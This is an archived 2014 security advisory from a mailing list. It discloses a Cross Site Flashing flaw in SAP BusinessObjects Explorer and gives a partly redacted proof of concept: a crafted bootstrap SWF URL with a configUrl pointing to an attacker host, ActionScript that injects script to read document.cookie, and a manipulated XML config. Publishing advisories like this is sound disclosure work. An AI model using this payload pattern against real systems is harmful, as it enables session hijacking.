lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 10 Oct 2014 07:37:19 +0200
From: "Alexandre Herzog" <alexandre.herzog@...c.ch>
To: <bugtraq@...urityfocus.com>, <fulldisclosure@...lists.org>
Subject: SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer

#######################################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product:           BusinessObjects Explorer
# Vendor:            SAP AG
# Subject:           Cross Site Flashing
# Risk:              High
# Effect:            Remotely exploitable
# Author:            Stefan Horlacher
# Date:              2014-10-10
# SAP Security Note: 1908647 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer is vulnerable against Cross Site Flashing [1]
attacks, allowing an attacker to e.g. steal the victim's session.
This vulnerability requires the victim to click on a malicious link
prepared by the attacker.


Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer


Technical Description:
----------------------
The Flash file suffers from a Cross Site Flashing vulnerability. It
is possible to directly load and display the
com_businessobjects_polestar_bootstrap.swf Flash file and specify a 
configUrl. This requires the victim to be logged and the attacker needs
to know the /webres/ URL, which is known as soon as the attacker is in 
possession of valid credentials. The configuration file specified in 
the configURL parameter may reside on a foreign host. The 
configuration file itself may contain URLs of further Flash files 
residing on a foreign domain. If successful, the victim loads foreign 
Flash files, which leads to Cross Site Flashing. The example below 
loads a Flash file, which injects JavaScript into the DOM of the 
originating domain.


	URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml


	Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml
		package
		{
			import flash.display.Sprite;
			import flash.events.Event;
			import flash.external.ExternalInterface;

			public class Main extends Sprite
			{
				public function Main():void
				{
					ExternalInterface.call("document.write",
					"<script>alert(document.cookie)</script>");
				}
			}
		}
	
	Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:
		<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"
			p:codebase="plugins/">
		<p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
			p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
		<p:bundles>
			<p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
			<p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
			<p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>
			<p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>
		[CUT BY COMPASS]

		
Timeline:
---------
2013-06-06:     Discovery by Stefan Horlacher
2013-06-26:     Initial vendor notification
2013-12-10:     Vendor releases patch and SAP Security Note 1908647
2014-10-10:     Disclosure of the advisory


References:
-----------
[0] https://service.sap.com/sap/support/notes/1908647
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project

Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (5234 bytes)

Powered by blists - more mailing lists